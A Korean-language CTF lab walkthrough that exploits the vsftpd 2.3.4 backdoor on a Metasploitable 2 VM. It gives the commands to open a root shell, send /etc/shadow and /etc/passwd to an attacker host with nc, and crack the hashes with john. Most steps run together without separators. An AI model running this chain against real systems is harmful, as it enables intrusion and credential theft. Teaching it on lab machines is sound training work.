
vsftpd 2.3.4 백도어(CVE-2011-2523)를 악용하여 Metasploitable 2에서 /etc/shadow 및 /etc/passwd를 캡처하고 크랙하는 단계별 CTF 워크스루.
취약한 Metasploitable 2 서버에서 복호화된 /etc/shadow 및 /etc/passwd 파일을 탈취하세요.
이 CTF에서는 VMware Workstation Pro에서 두 개의 가상 머신을 실행합니다. 공격자 머신으로 Kali Linux를, 취약 머신으로 Metasploitable 2를 사용합니다.
Open a Virtual Machine 옵션을 선택하고 압축이 풀린 Kali Linux 파일을 선택합니다.open 옵션을 선택한 후, 압축이 풀린 Metasploitable 2 파일을 선택합니다.Play virtual machine 버튼을 누릅니다.I moved It 또는 I copied It 옵션을 선택하라는 메시지가 나타나면 I copied It 옵션을 선택합니다.kali를 사용하여 Kali Linux에 로그인합니다.msfadmin을 사용하여 Metasploitable에 로그인합니다.ip addr show를 실행하고 inet 섹션의 IP 주소를 기록합니다.매사추세츠 공과대학교 연구 및 엔지니어링에서는 CVE-2011-2523을 다음과 같은 일반적인 취약점 및 노출로 설명합니다: vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:)가 있는 임의의 문자열이며, user <string>:)을 입력합니다.pass <string>을 입력합니다. nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami를 사용하여 루트 액세스 권한이 부여되었음을 확인/etc/shadow 및 /etc/passwd 파일을 다른 파일로 복사cp /etc/shadow shadow.txtcp /etc/passwd passwd.txtip addr show 명령어를 사용하여 inet 아래의 IP 주소를 확인합니다.nc -l -p 1234 > shadow.txt를 사용하여 파일 수신 대기nc -w 3 <destination-ip> 1234 < shadow.txtJohn 도구 형식으로 변환unshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input을 사용하여 파일을 확인하면 사용자 이름과 비밀번호가 저장되어 있어야 합니다.John 명령과 단어 목록을 사용하여 shadow 파일 복호화rockyou.txt 단어 목록을 사용하여 john으로 해시 크랙sudo gzip -d /usr/share/wordlists/rockyou.txt.gz를 사용하여 단어 목록 파일 압축 해제kali를 사용합니다.john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt를 사용하여 비밀번호 해시 해제john –show unshadowed-input